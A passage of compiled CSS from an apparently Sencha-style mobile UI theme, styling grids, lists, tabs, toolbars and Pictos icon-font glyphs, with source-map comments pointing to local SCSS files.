-moz-transform: translate3d(0, 0, 0);
-ms-transform: translate3d(0, 0, 0);
-o-transform: translate3d(0, 0, 0);
transform: translate3d(0, 0, 0);
}
/* http://localhost:1843/modern/theme-base/sass/src/grid/Grid.scss:164 */
.x-grid-grouped .x-grid-row.x-grid-header-wrap .x-dock-horizontal,
.x-grid-grouped .x-grid-row-tpl.x-grid-header-wrap {
border-top: 0;
}
/* http://localhost:1843/modern/theme-base/sass/src/plugin/ListPaging.scss:6 */
.x-list-paging .x-loading-spinner {
display: none;
margin: auto;
}
/* http://localhost:1843/modern/theme-base/sass/src/plugin/ListPaging.scss:11 */
.x-list-paging .x-list-paging-msg {
text-align: center;
clear: both;
}
/* http://localhost:1843/modern/theme-base/sass/src/plugin/ListPaging.scss:17 */
.x-list-paging.x-loading .x-loading-spinner {
display: block;
}
/* http://localhost:1843/modern/theme-base/sass/src/plugin/ListPaging.scss:21 */
.x-list-paging.x-loading .x-list-paging-msg {
display: none;
}
/* http://localhost:1843/modern/theme-base/sass/src/plugin/PullRefresh.scss:5 */
.x-list-pullrefresh {
display: flex;
display: -webkit-box;
display: -ms-flexbox;
-webkit-box-orient: horizontal;
-ms-flex-direction: row;
flex-direction: row;
-webkit-box-align: center;
-ms-flex-align: center;
align-items: center;
-webkit-box-pack: center;
-ms-flex-pack: center;
justify-content: center;
-webkit-box-direction: normal;
-ms-flex-direction: row;
flex-direction: row;
position: absolute;
top: -5em;
left: 0;
width: 100%;
height: 4.5em;
}
/* http://localhost:1843/modern/theme-base/sass/src/plugin/PullRefresh.scss:18 */
.x-list-pullrefresh .x-loading-spinner {
display: none;
}
/* http://localhost:1843/modern/theme-base/sass/src/plugin/PullRefresh.scss:23 */
.x-list-pullrefresh-arrow {
width: 2.5em;
height: 4.5em;
background-color: #bbb;
}
/* http://localhost:1843/modern/theme-base/sass/src/plugin/PullRefresh.scss:29 */
.x-list-pullrefresh-wrap {
width: 20em;
font-size: 0.7em;
}
/* http://localhost:1843/modern/theme-base/sass/src/plugin/PullRefresh.scss:34 */
.x-list-pullrefresh-message {
font-weight: bold;
font-size: 1.3em;
text-align: center;
}
/* http://localhost:1843/modern/theme-base/sass/src/plugin/PullRefresh.scss:40 */
.x-list-pullrefresh-updated {
text-align: center;
}
/* http://localhost:1843/modern/theme-base/sass/src/plugin/PullRefresh.scss:45 */
.x-list-pullrefresh-loading *.x-loading-spinner {
display: block;
}
/* http://localhost:1843/modern/theme-base/sass/src/plugin/PullRefresh.scss:49 */
.x-list-pullrefresh-loading .x-list-pullrefresh-arrow {
display: none;
}
/* http://localhost:1843/modern/theme-base/sass/src/plugin/PullRefresh.scss:55 */
.x-android-2 .x-list-pullrefresh-loading *.x-loading-spinner {
display: none;
}
/* http://localhost:1843/modern/theme-base/sass/src/plugin/field/PlaceHolderLabel.scss:2 */
.x-placeholderlabel .x-form-label {
-webkit-transition: opacity .1s ease-in-out, -webkit-transform .1s ease-in-out;
-webkit-transform: translate(0, 2em);
opacity: 0;
padding: 0.3em;
}
/* http://localhost:1843/modern/theme-base/sass/src/plugin/field/PlaceHolderLabel.scss:10 */
.x-placeholderlabel.x-show-label .x-form-label {
-webkit-transform: translate(0, 0);
opacity: 1;
}
/* http://localhost:1843/modern/theme-base/sass/src/tab/Panel.scss:6 */
.x-tabbar.x-docked-top .x-tab .x-button-icon {
position: relative;
}
/* http://localhost:1843/modern/theme-base/sass/src/tab/Panel.scss:9 */
.x-tabbar.x-docked-top .x-tab .x-button-icon.x-shown {
display: inline-block;
}
/* http://localhost:1843/modern/theme-base/sass/src/tab/Panel.scss:13 */
.x-tabbar.x-docked-top .x-tab .x-button-icon.x-hidden {
display: none;
}
/* http://localhost:1843/modern/theme-base/sass/src/tab/Panel.scss:20 */
.x-tabbar.x-docked-bottom .x-tab .x-button-icon {
display: block;
position: relative;
}
/* http://localhost:1843/modern/theme-base/sass/src/tab/Panel.scss:24 */
.x-tabbar.x-docked-bottom .x-tab .x-button-icon.x-shown {
visibility: visible;
}
/* http://localhost:1843/modern/theme-base/sass/src/tab/Panel.scss:28 */
.x-tabbar.x-docked-bottom .x-tab .x-button-icon.x-hidden {
visibility: hidden;
}
/* http://localhost:1843/modern/theme-base/sass/src/table/Table.scss:6 */
.x-table-inner {
display: table;
width: 100% !important;
height: 100% !important;
}
/* http://localhost:1843/modern/theme-base/sass/src/table/Table.scss:11 */
.x-table-inner.x-fixed-layout {
table-layout: fixed !important;
}
/* http://localhost:1843/modern/theme-base/sass/src/table/Table.scss:16 */
.x-table-row {
display: table-row;
}
/* http://localhost:1843/modern/theme-base/sass/src/table/Table.scss:20 */
.x-table-cell {
display: table-cell;
vertical-align: middle;
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:5 */
@font-face {
font-family: 'Pictos';
src: url('font-pictos/fonts/pictos-web.eot');
src: url('font-pictos/fonts/pictos-web.eot?#iefix') format('embedded-opentype'), url('font-pictos/fonts/pictos-web.woff') format('woff'), url('font-pictos/fonts/pictos-web.ttf') format('truetype');
font-weight: normal;
font-style: normal;
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:15 */
.pictos {
font-family: Pictos;
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:19 */
.pictos-anchor:before {
content: "a";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:20 */
.pictos-box:before {
content: "b";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:21 */
.pictos-upload:before {
content: "c";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:22 */
.pictos-forbidden:before {
content: "d";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:23 */
.pictos-lightning:before {
content: "e";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:24 */
.pictos-rss:before {
content: "f";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:25 */
.pictos-team:before {
content: "g";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:26 */
.pictos-help:before {
content: "h";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:27 */
.pictos-info:before {
content: "i";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:28 */
.pictos-attachment:before {
content: "j";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:29 */
.pictos-heart:before {
content: "k";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:30 */
.pictos-list:before {
content: "l";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:31 */
.pictos-music:before {
content: "m";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:32 */
.pictos-table:before {
content: "n";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:33 */
.pictos-folder:before {
content: "o";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:34 */
.pictos-pencil:before {
content: "p";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:35 */
.pictos-chat2:before {
content: "q";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:36 */
.pictos-retweet:before {
content: "r";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:37 */
.pictos-search:before {
content: "s";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:38 */
.pictos-time:before {
content: "t";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:39 */
.pictos-switch:before {
content: "u";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:40 */
.pictos-camera:before {
content: "v";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:41 */
.pictos-chat:before {
content: "w";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:42 */
.pictos-settings2:before {
content: "x";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:43 */
.pictos-settings:before {
content: "y";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:44 */
.pictos-tags:before {
content: "z";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:45 */
.pictos-attachment2:before {
content: "A";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:46 */
.pictos-bird:before {
content: "B";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:47 */
.pictos-cloud:before {
content: "C";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:48 */
.pictos-delete_black1:before {
content: "D";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:49 */
.pictos-eye:before {
content: "E";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:50 */
.pictos-file:before {
content: "F";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:51 */
.pictos-browser:before {
content: "G";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:52 */
.pictos-home:before {
content: "H";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:53 */
.pictos-inbox:before {
content: "I";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:54 */
.pictos-network:before {
content: "J";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:55 */
.pictos-key:before {
content: "K";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:56 */
.pictos-radio:before {
content: "L";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:57 */
.pictos-mail:before {
content: "M";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:58 */
.pictos-news:before {
content: "N";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:59 */
.pictos-case:before {
content: "O";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:60 */
.pictos-photos:before {
content: "P";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:61 */
.pictos-power:before {
content: "Q";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:62 */
.pictos-action:before {
content: "R";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:63 */
.pictos-favorites:before {
content: "S";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:64 */
.pictos-plane:before {
content: "T";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:65 */
.pictos-user:before {
content: "U";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:66 */
.pictos-video:before {
content: "V";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:67 */
.pictos-compose:before {
content: "W";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:68 */
.pictos-truck:before {
content: "X";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:69 */
.pictos-chart2:before {
content: "Y";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:70 */
.pictos-chart:before {
content: "Z";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:71 */
.pictos-expand:before {
content: "`";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:72 */
.pictos-refresh:before {
content: "1";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:73 */
.pictos-check:before {
content: "2";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:74 */
.pictos-check2:before {
content: "3";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:75 */
.pictos-play:before {
content: "4";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:76 */
.pictos-pause:before {
content: "5";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:77 */
.pictos-stop:before {
content: "6";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:78 */
.pictos-forward:before {
content: "7";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:79 */
.pictos-rewind:before {
content: "8";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:80 */
.pictos-play2:before {
content: "9";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:81 */
.pictos-refresh2:before {
content: "0";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:82 */
.pictos-minus:before {
content: "-";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:83 */
.pictos-battery:before {
content: "=";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:84 */
.pictos-left:before {
content: "[";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:85 */
.pictos-right:before {
content: "]";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:86 */
.pictos-calendar:before {
content: "\005C";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:87 */
.pictos-shuffle:before {
content: ";";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:88 */
.pictos-wireless:before {
content: "'";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:89 */
.pictos-speedometer:before {
content: ",";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:90 */
.pictos-more:before {
content: ".";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:91 */
.pictos-print:before {
content: "/";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:92 */
.pictos-download:before {
content: "~";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:93 */
.pictos-warning_black:before {
content: "!";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:94 */
.pictos-locate:before {
content: "@";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:95 */
.pictos-trash:before {
content: "#";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:96 */
.pictos-cart:before {
content: "$";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:97 */
.pictos-bank:before {
content: "%";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:98 */
.pictos-flag:before {
content: "^";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:99 */
.pictos-add:before {
content: "&";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:100 */
.pictos-delete:before {
content: "*";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:101 */
.pictos-lock:before {
content: "(";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:102 */
.pictos-unlock:before {
content: ")";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:103 */
.pictos-minus2:before {
content: "_";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:104 */
.pictos-add2:before {
content: "+";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:105 */
.pictos-up:before {
content: "{";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:106 */
.pictos-down:before {
content: "}";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:107 */
.pictos-screens:before {
content: "|";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:108 */
.pictos-bell:before {
content: ":";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:109 */
.pictos-quote:before {
content: "\"";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:110 */
.pictos-volume_mute:before {
content: "<";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:111 */
.pictos-volume:before {
content: ">";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:112 */
.pictos-question:before {
content: "?";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:113 */
.pictos-arrow_left:before {
content: "[";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:114 */
.pictos-arrow_right:before {
content: "]";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:115 */
.pictos-arrow_up:before {
content: "{";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:116 */
.pictos-arrow_down:before {
content: "}";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:117 */
.pictos-organize:before {
content: "I";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:118 */
.pictos-bookmarks:before {
content: "I";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:119 */
.pictos-loop2:before {
content: "r";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:120 */
.pictos-star:before {
content: "S";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:121 */
.pictos-maps:before {
content: "@";
}
/* http://localhost:1843/packages/font-pictos/sass/src/all.scss:122 */
.pictos-reply:before {
content: "R";
}
/* http://localhost:1843/modern/theme-device-base/sass/src/Component.scss:1 */
.x-html {
line-height: 1.5;
color: #333;
font-size: .8em;
padding: 1.2em;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/Panel.scss:1 */
.x-msgbox {
padding: 6px;
background-color: #ccc;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/Panel.scss:6 */
.x-panel.x-floating,
.x-form.x-floating {
padding: 6px;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/Panel.scss:9 */
.x-panel.x-floating > * > .x-dock-body,
.x-form.x-floating > * > .x-dock-body {
background-color: #fff;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/Button.scss:1 */
.x-button {
background-color: #eee;
border: 1px solid #ccc;
line-height: normal;
foo: 1;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/Button.scss:8 */
.x-badge {
background-color: #ccc;
border: 1px solid #aaa;
position: absolute !important;
width: auto;
font-size: .6em;
right: 0;
top: 0;
max-width: 95%;
display: inline-block;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/Toolbar.scss:1 */
.x-toolbar {
background-color: #eee;
min-height: 2.6em;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/Toolbar.scss:5 */
.x-toolbar.x-docked-top {
border-bottom: 1px solid;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/Toolbar.scss:9 */
.x-toolbar.x-docked-bottom {
border-top: 1px solid;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/Toolbar.scss:13 */
.x-toolbar.x-docked-left {
width: 50px;
height: auto;
border-right: 1px solid;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/Toolbar.scss:19 */
.x-toolbar.x-docked-right {
width: 50px;
height: auto;
border-left: 1px solid;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/Toolbar.scss:26 */
.x-title {
font-size: 1.2em;
font-weight: bold;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/Toolbar.scss:31 */
.x-title.x-title-align-left {
padding-left: 10px;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/Toolbar.scss:36 */
.x-title.x-title-align-right {
padding-right: 10px;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/MessageBox.scss:1 */
.x-msgbox {
border: 1px solid #ccc;
margin: 6px;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/MessageBox.scss:6 */
.x-msgbox .x-toolbar.x-docked-top {
border-bottom: 0;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/MessageBox.scss:10 */
.x-msgbox .x-toolbar.x-docked-bottom {
border-top: 0;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/MessageBox.scss:16 */
.x-msgbox-text {
text-align: center;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/dataview/List.scss:3 */
.x-list .x-list-item.x-item-selected .x-dock-horizontal,
.x-list .x-list-item.x-item-selected.x-list-item-tpl {
background-color: #ccc;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/dataview/List.scss:9 */
.x-list .x-list-item.x-item-pressed.x-list-item-tpl,
.x-list .x-list-item.x-item-pressed .x-dock-horizontal {
background-color: #ddd;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/dataview/List.scss:15 */
.x-list .x-list-item .x-list-item-body,
.x-list .x-list-item.x-list-item-tpl .x-innerhtml {
padding: 5px;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/dataview/List.scss:20 */
.x-list .x-item-selected .x-list-disclosure {
background-color: #fff;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/dataview/List.scss:24 */
.x-list .x-list-header {
background-color: #eee;
border-top: 1px solid #ccc;
border-bottom: 1px solid #ccc;
font-weight: bold;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/dataview/List.scss:31 */
.x-list .x-list-disclosure {
margin: 5px 15px 5px 0;
overflow: visible;
width: 20px;
height: 20px;
border: 1px solid #ccc;
background-color: #eee;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/dataview/List.scss:40 */
.x-list .x-list-item-tpl .x-list-disclosure {
position: absolute;
right: 0px;
top: 0px;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/dataview/List.scss:47 */
.x-list.x-list-indexed .x-list-disclosure {
margin-right: 35px;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/field/Spinner.scss:1 */
.x-spinner-button-down:before {
content: '-';
}
/* http://localhost:1843/modern/theme-device-base/sass/src/field/Spinner.scss:4 */
.x-spinner-button-up:before {
content: '+';
}
/* http://localhost:1843/modern/theme-device-base/sass/src/field/Spinner.scss:9 */
.x-spinner .x-spinner-button {
border: 1px solid #ccc !important;
background-color: #eee;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/form/Panel.scss:1 */
.x-field-input .x-clear-icon,
.x-field-input .x-reveal-icon {
width: 10px;
height: 10px;
right: 0;
background-color: #ccc;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/form/Panel.scss:9 */
.x-form-label span {
font-weight: bold;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/form/Panel.scss:15 */
.x-field-clearable .x-field-input {
padding-right: 10px;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/form/Panel.scss:21 */
.x-field-revealable .x-field-input {
padding-right: 10px;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/form/Panel.scss:27 */
.x-field-clearable.x-field-revealable .x-reveal-icon {
right: 20px;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/grid/Grid.scss:1 */
.x-grid-row {
border-width: 0 0 1px 0;
border-style: solid;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/grid/Grid.scss:6 */
.x-grid-cell {
line-height: 60px;
padding: 0 8px;
height: 60px;
border-width: 0 1px 0 0;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/grid/Grid.scss:13 */
.x-grid-summaryrow {
height: 32px;
font-size: 0.8em;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/grid/Grid.scss:17 */
.x-grid-summaryrow .x-grid-cell {
height: 32px;
line-height: 30px;
border-width: 0 0 1px;
border-style: solid;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/grid/Grid.scss:25 */
.x-grid-header {
line-height: 44px;
font-weight: bold;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/grid/Grid.scss:30 */
.x-grid-header-container {
border-width: 0 1px 1px 0;
border-style: solid;
height: 65px;
font-weight: bold;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/grid/Grid.scss:36 */
.x-grid-header-container .x-grid-header-container-inner {
width: 100000px;
position: absolute;
top: 0;
left: 0;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/grid/Grid.scss:43 */
.x-grid-header-container .x-grid-column {
display: inline-block;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/grid/Grid.scss:48 */
.x-grid-column {
height: 64px;
border-width: 1px 1px 0 1px;
border-style: solid;
line-height: 64px;
vertical-align: middle;
padding: 0 8px;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/grid/Grid.scss:56 */
.x-grid-column .x-innerhtml {
position: relative;
display: inline-block;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/grid/Grid.scss:63 */
.x-grid-column.x-column-sorted-asc .x-innerhtml:after,
.x-grid-column.x-column-sorted-desc .x-innerhtml:after {
position: absolute;
width: 12px;
line-height: 64px;
top: 0;
height: 64px;
font-family: 'Pictos';
font-size: 12px;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/grid/Grid.scss:76 */
.x-grid-column.x-column-align-left .x-innerhtml:after,
.x-grid-column.x-column-align-center .x-innerhtml:after {
right: -16px;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/grid/Grid.scss:80 */
.x-grid-column.x-column-align-right .x-innerhtml:after {
left: -16px;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/grid/Grid.scss:84 */
.x-grid-column.x-column-sorted-asc .x-innerhtml:after {
content: "{";
}
/* http://localhost:1843/modern/theme-device-base/sass/src/grid/Grid.scss:87 */
.x-grid-column.x-column-sorted-desc .x-innerhtml:after {
content: "}";
}
/* http://localhost:1843/modern/theme-device-base/sass/src/grid/Grid.scss:92 */
.x-grid-headergroup {
display: inline-block;
position: relative;
vertical-align: bottom;
height: 64px;
padding-top: 32px;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/grid/Grid.scss:99 */
.x-grid-headergroup .x-inner > .x-innerhtml {
height: 32px;
line-height: 28px;
vertical-align: middle;
display: block;
position: absolute;
width: 100%;
top: 0;
left: 0;
border-style: solid;
border-width: 1px;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/grid/Grid.scss:112 */
.x-grid-headergroup .x-grid-column {
height: 32px !important;
line-height: 27px !important;
font-size: 0.7em;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/grid/Grid.scss:119 */
.x-grid-headergroup .x-grid-column.x-column-sorted-asc .x-innerhtml:after,
.x-grid-headergroup .x-grid-column.x-column-sorted-desc .x-innerhtml:after {
line-height: 27px;
height: 27px;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/grid/Grid.scss:127 */
.x-grid-pagingtoolbar-prev {
font-family: Pictos;
line-height: 1;
}
/* http://localhost:1843/modern/theme-base/sass/etc/mixins/font-icon.scss:125 */
.x-grid-pagingtoolbar-prev:before {
content: "[";
}
/* http://localhost:1843/modern/theme-device-base/sass/src/grid/Grid.scss:131 */
.x-grid-pagingtoolbar-next {
font-family: Pictos;
line-height: 1;
}
/* http://localhost:1843/modern/theme-base/sass/etc/mixins/font-icon.scss:125 */
.x-grid-pagingtoolbar-next:before {
content: "]";
}
/* http://localhost:1843/modern/theme-device-base/sass/src/grid/Grid.scss:136 */
.x-grid-viewoptions .x-list-item .x-innerhtml {
padding: 0px !important;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/grid/Grid.scss:140 */
.x-grid-viewoptions .x-column-options-header {
height: 32px;
line-height: 28px;
vertical-align: middle;
border-style: solid;
border-width: 1px;
overflow: hidden;
padding-left: 10px;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/grid/Grid.scss:150 */
.x-grid-viewoptions .x-column-options-sortablehandle,
.x-grid-viewoptions .x-column-options-visibleindicator,
.x-grid-viewoptions .x-column-options-groupindicator,
.x-grid-viewoptions .x-column-options-folder,
.x-grid-viewoptions .x-column-options-leaf {
width: 40px;
height: 48px;
position: absolute;
bottom: 0;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/grid/Grid.scss:160 */
.x-grid-viewoptions .x-column-options-sortablehandle:after,
.x-grid-viewoptions .x-column-options-visibleindicator:after,
.x-grid-viewoptions .x-column-options-groupindicator:after,
.x-grid-viewoptions .x-column-options-folder:after,
.x-grid-viewoptions .x-column-options-leaf:after {
position: absolute;
top: 0;
left: 0;
height: 100%;
width: 100%;
text-align: center;
font-size: 24px;
line-height: 48px;
vertical-align: middle;
font-family: 'Pictos';
}
/* http://localhost:1843/modern/theme-device-base/sass/src/grid/Grid.scss:174 */
.x-grid-viewoptions .x-column-options-sortablehandle {
left: 0;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/grid/Grid.scss:176 */
.x-grid-viewoptions .x-column-options-sortablehandle:after {
line-height: 54px;
content: "l";
}
/* http://localhost:1843/modern/theme-device-base/sass/src/grid/Grid.scss:181 */
.x-grid-viewoptions .x-column-options-visibleindicator {
right: 0;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/grid/Grid.scss:183 */
.x-grid-viewoptions .x-column-options-visibleindicator:after {
font-size: 30px;
line-height: 54px;
content: "E";
}
/* http://localhost:1843/modern/theme-device-base/sass/src/grid/Grid.scss:190 */
.x-grid-viewoptions .x-column-options-groupindicator {
right: 40px;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/grid/Grid.scss:192 */
.x-grid-viewoptions .x-column-options-groupindicator:after {
font-size: 30px;
line-height: 54px;
content: "g";
}
/* http://localhost:1843/modern/theme-device-base/sass/src/grid/Grid.scss:199 */
.x-grid-viewoptions .x-column-options-folder,
.x-grid-viewoptions .x-column-options-leaf {
width: 30px;
left: 40px;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/grid/Grid.scss:204 */
.x-grid-viewoptions .x-column-options-folder:after,
.x-grid-viewoptions .x-column-options-leaf:after {
line-height: 52px;
content: "o";
}
/* http://localhost:1843/modern/theme-device-base/sass/src/grid/Grid.scss:210 */
.x-grid-viewoptions .x-column-options-leaf:after {
content: "F";
}
/* http://localhost:1843/modern/theme-device-base/sass/src/grid/Grid.scss:214 */
.x-grid-viewoptions .x-column-options-text {
display: block;
height: 30px;
margin: 10px 50px 5px 80px;
position: relative;
vertical-align: middle;
line-height: 28px;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/tab/Panel.scss:1 */
.x-tab {
background-color: #eee;
border: 1px solid #ccc;
min-width: 3.3em;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/tab/Panel.scss:7 */
.x-tabbar {
border-color: #ccc;
border-style: solid;
border-width: 0;
background-color: #eee;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/tab/Panel.scss:14 */
.x-tabbar.x-docked-top {
border-bottom-width: 1px;
}
/* http://localhost:1843/modern/theme-device-base/sass/src/tab/Panel.scss:18 */
.x-tabbar.x-docked-bottom {
border-top-width: 1px;
}
/* http://localhost:1843/packages/core/sass/src/util/SizeMonitor.scss:5 */
.x-size-monitored {
position: relative;
}
/* http://localhost:1843/packages/core/sass/src/util/SizeMonitor.scss:9 */
.x-size-monitors {
position: absolute;
left: 0;
top: 0;
width: 100%;
height: 100%;
visibility: hidden;
overflow: hidden;
}
/* http://localhost:1843/packages/core/sass/src/util/SizeMonitor.scss:18 */
